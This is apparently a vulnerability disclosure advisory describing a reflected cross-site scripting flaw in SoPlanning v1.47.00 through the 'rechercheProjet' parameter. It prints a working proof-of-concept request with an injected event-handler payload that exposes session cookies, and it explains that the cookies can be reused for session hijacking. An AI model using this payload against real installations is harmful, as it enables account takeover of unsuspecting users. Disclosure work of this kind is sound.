Research

Reflected XSS Vulnerability – SoPlanning

Researchers:

Nour Alomary

Background

Modern applications typically rely on user input to provide the required functionality to the user. In doing so, the application accepts data from an untrusted source. In some circumstances, this data is processed and output to the end user. In other cases, this data is stored by the application for retrieval at a later stage, or for the viewing of other application users or passing onto other services in order to carry out the user request. Cross-Site Scripting is a vulnerability resulting from the lack of or inadequate sanitisation carried out on user supplied data which is then later rendered back to a user.

When an application includes user-supplied data in its HTTP response without proper sanitisation, any HTML or JavaScript included within that data would be executed when the response is rendered in the user’s browser. This behaviour could be leveraged by an attacker in order to compromise user sessions within the application. This could allow the attacker to impersonate legitimate users through session hijacking. They could also carry out unauthorised actions in the current user context or access data processed by the application.

A variation of Cross-Site Scripting exists which stores the payload in the application which is executed every time the vulnerable parameter is rendered, this is known as stored Cross-Site Scripting.

Details

SoPlanning v1.47.00 was vulnerable to a reflected Cross-Site Scripting vulnerability.

The following page was vulnerable through the ‘rechercheProjet’ URL parameter. The request below showed the injected JavaScript payload which when executed showed the current user’s session cookies as shown in Figure 1:

				
					GET
/soplanning/www/groupe_list.php?statut%5B%5D=todo&statut%5B%5D=progress&statut%5B%5D=done&statut%5B%5D=abort&statut%5B%5D=archive&rechercheProjet=test%22onmouseover=confirm(document.cookie)%3E%3C/div%3E%3C/div%3EX%3C!--
HTTP/1.1
Host: 192.168.0.88
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: dateDebut=03/09/2020; dateFin=03/11/2020; xposJoursWin=0; xposMoisWin=0; yposJoursWin=0; yposMoisWin=0; soplanningplanning_=r22g78taga3ok7tg3d5l03434n; baseColonne=jours; baseLigne=projets; dimensionCase=reduit
Connection: close

Figure 1 – Authenticated User Cookies

The following was the response which showed the XSS payload rendered in the document:

Independently, this vulnerability would allow an attacker to steal the session cookies for an authenticated user which would grant them the same access as the target user. This was verified through using the extracted session cookies in a different browser. It could also be used to load and execute malicious code within the application or simply be used to target the user’s browser.